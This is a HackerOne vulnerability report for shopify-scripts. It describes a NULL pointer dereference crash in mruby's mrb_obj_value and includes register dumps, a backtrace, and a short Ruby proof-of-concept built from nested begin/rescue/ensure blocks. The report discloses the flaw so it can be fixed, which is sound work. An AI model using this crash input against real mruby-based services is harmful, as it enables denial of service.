shopify-scripts: SIGSEGV - mrb_obj_value

2017-03-15T20:35:55
ID H1:213779
Type hackerone
Reporter icanthack
Modified 2017-04-19T07:40:02

Description

Environment: Linux, Ubuntu Xenial 64-bit, mruby at commit f8b31a0db671b71d2794ce866b87596a09c10bf0 (Author: Yukihiro "Matz" Matsumoto <matz@ruby-lang.org>, Date: Wed Mar 15 09:00:03 2017 +0900).

The crash is a NULL pointer dereference: mrb_vm_exec (src/vm.c:1096) calls mrb_obj_value with p=0x0, and SET_OBJ_VALUE at include/mruby/value.h:212 reads a byte of the object header through that pointer. The faulting instruction is movzx eax,BYTE PTR [rax] with RAX=0x0 (RDI, the first argument, is also 0x0). The PoC at the end of the report triggers it with nested begin/rescue/ensure blocks.

output

```
RAX: 0x0
RBX: 0x6c4e80 --> 0x1
RCX: 0x6c4e50 --> 0x6b4320 --> 0x112
RDX: 0xf222f69400000003
RSI: 0x6b4320 --> 0x112
RDI: 0x0
RBP: 0x7fffffffdb10 --> 0x7fffffffe1d0 --> 0x7fffffffe220 --> 0x7fffffffe280 --> 0x7fffffffe410 --> 0x7fffffffe440 (--> ...)
RSP: 0x7fffffffdaf0 --> 0x6bc8d0 --> 0x9109
RIP: 0x417da4 (<mrb_obj_value+16>: movzx  eax,BYTE PTR [rax])
R8 : 0x3
R9 : 0x7fffffffe1d0 --> 0x7fffffffe220 --> 0x7fffffffe280 --> 0x7fffffffe410 --> 0x7fffffffe440 --> 0x7fffffffe500 (--> ...)
R10: 0x12
R11: 0x7ffff7899390 --> 0xfffda380fffda0af
R12: 0x0
R13: 0x3
R14: 0x0
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x417d98 <mrb_obj_value+4>:    sub    rsp,0x20
   0x417d9c <mrb_obj_value+8>:    mov    QWORD PTR [rbp-0x18],rdi
   0x417da0 <mrb_obj_value+12>:   mov    rax,QWORD PTR [rbp-0x18]
=> 0x417da4 <mrb_obj_value+16>:   movzx  eax,BYTE PTR [rax]
   0x417da7 <mrb_obj_value+19>:   movzx  eax,al
   0x417daa <mrb_obj_value+22>:   mov    DWORD PTR [rbp-0x8],eax
   0x417dad <mrb_obj_value+25>:   mov    rax,QWORD PTR [rbp-0x18]
   0x417db1 <mrb_obj_value+29>:   mov    QWORD PTR [rbp-0x10],rax
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdaf0 --> 0x6bc8d0 --> 0x9109
0008| 0x7fffffffdaf8 --> 0x0
0016| 0x7fffffffdb00 --> 0x1
0024| 0x7fffffffdb08 --> 0x2
0032| 0x7fffffffdb10 --> 0x7fffffffe1d0 --> 0x7fffffffe220 --> 0x7fffffffe280 --> 0x7fffffffe410 --> 0x7fffffffe440 (--> ...)
0040| 0x7fffffffdb18 --> 0x41b658 (<mrb_vm_exec+4559>:  mov    QWORD PTR [rbp-0x2e0],rax)
0048| 0x7fffffffdb20 --> 0x6b20e8 --> 0x6fc830 --> 0x708800 --> 0x1
0056| 0x7fffffffdb28 --> 0x71bba4 --> 0x24000980181001b
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000417da4 in mrb_obj_value (p=0x0) at /home/ubuntu/mruby/include/mruby/value.h:212
212       SET_OBJ_VALUE(v, (struct RBasic*)p);
```

backtrace

```
#0  0x0000000000417da4 in mrb_obj_value (p=0x0) at /home/ubuntu/mruby/include/mruby/value.h:212
#1  0x000000000041b658 in mrb_vm_exec (mrb=0x6b2010, proc=0x6b4d40, pc=0x71bba4)
    at /home/ubuntu/mruby/src/vm.c:1096
#2  0x000000000041a487 in mrb_vm_run (mrb=0x6b2010, proc=0x6b4d40, self=..., stack_keep=0x0)
    at /home/ubuntu/mruby/src/vm.c:820
#3  0x000000000042291f in mrb_top_run (mrb=0x6b2010, proc=0x6b4d40, self=..., stack_keep=0x0)
    at /home/ubuntu/mruby/src/vm.c:2615
#4  0x000000000044925b in mrb_load_exec (mrb=0x6b2010, p=0x70eda0, c=0x70da00)
    at /home/ubuntu/mruby/mrbgems/mruby-compiler/core/parse.y:5760
#5  0x00000000004492f1 in mrb_load_file_cxt (mrb=0x6b2010, f=0x70e9f0, c=0x70da00)
    at /home/ubuntu/mruby/mrbgems/mruby-compiler/core/parse.y:5769
#6  0x00000000004022f0 in main (argc=0x2, argv=0x7fffffffe5e8)
    at /home/ubuntu/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:227
#7  0x00007ffff7725830 in __libc_start_main (main=0x401fd6 <main>, argc=0x2, argv=0x7fffffffe5e8,
    init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>,
    stack_end=0x7fffffffe5d8) at ../csu/libc-start.c:291
#8  0x00000000004019b9 in _start ()
```

PoC

```
begin
rescue => a
end

begin
  b
rescue
  begin
    c ""
  rescue => d
    0
  ensure
  end
end
```